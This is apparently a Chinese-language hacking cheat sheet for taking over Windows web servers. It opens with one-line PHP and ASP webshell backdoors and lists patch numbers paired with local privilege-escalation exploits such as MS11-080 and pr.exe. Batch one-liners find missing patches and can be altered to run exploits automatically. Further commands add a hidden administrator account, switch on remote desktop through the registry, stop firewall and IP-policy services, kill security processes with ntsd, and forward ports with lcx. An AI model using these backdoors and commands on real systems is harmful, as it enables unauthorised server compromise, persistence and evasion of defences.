判別木馬

 

eval (base64_decode($_POST["php"]));

<?php @eval($_POST[sb])?>

 

<%eval request("sb")%>

Eval(Request(chr(35)))

<%ExecuteGlobal request("sb")%>

<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

 

 

systeminfo命令查看下是否有未補丁漏洞，或者通過查詢c:windows 里留下的補丁號.log來看看服務器大概打了哪些補丁

 

KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB944653 MS07-067
KB952004 MS09-012   pr

KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011  ms11011.exe
kb942831 MS08-005
KB2503665 MS11-046  ms11046.exe

KB2592799 MS11-080  ms11080.exe

沒打補丁的話,會被上傳惡心的exploit.

當asp不支持WScript時候.而支持aspx的腳本時候就會用aspx，因為Aspx webshell是調用.net的組件來運行cmd命令的.

Aspxspy還有一個反彈的 端口映射

/c C:RECYCLER ms11080.exe 

Pr的使用方法就是 文件所在的路徑 + “cmd命令” ps:要注意有””雙引號!!.

C:RECYCLER pr.exe "net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add"

若是執行pr,為什么不回顯呢?
因為上傳的文件的路徑 文件夾里面有 空格c:Documents and Settings 所以一般會被放到C:RECYCLER

接着就被查看3389的端口.點擊讀取注冊表,讀取HK_L_M SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber
這個鍵里面的值.

附錄1.

IIS6.0下將webshell提升為system用戶權限的方法:進入應用程序池-屬性-標識：將標識里面的預定義賬號設為:本地系統 （代表webshell具有system用戶權限）或者選用那個”IWAM_主機名”用戶，再用clone5.exe程序克隆“IWAM_主機名”用戶

你可以把“@echo %i Not Installed!” 換成 “%i.exe Parameters“，就可以自動提權了（沒換是檢測那個漏洞）……

 

systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find /i  "%i" ||@echo %i Not Installed!)&del /f /q /a a.txt

 

dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

 

3.3389連接不上的解決方法
如果直接連接連接不上的話,有可能是以下幾種情況以及解決方法

1.遠程桌面服務沒開啟
可以把
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
保存成bat文件在cmd下找個可寫目錄然后以system權限運行.
2.IP策略阻攔
sc stop policyagent
3.windows自帶防火牆阻攔
net stop sharedaccess
4.其他防火牆阻攔
tasklist /svc此命令可以獲取每個進程中主持的服務
看到哪個不是系統自帶的服務或者正在運行的進程
用ntsd -c q -pn xxx.exe 和 net stop 還有sc stop 這幾個命令以system權限xx掉它.
5.內網
可以通過lcx等轉發工具.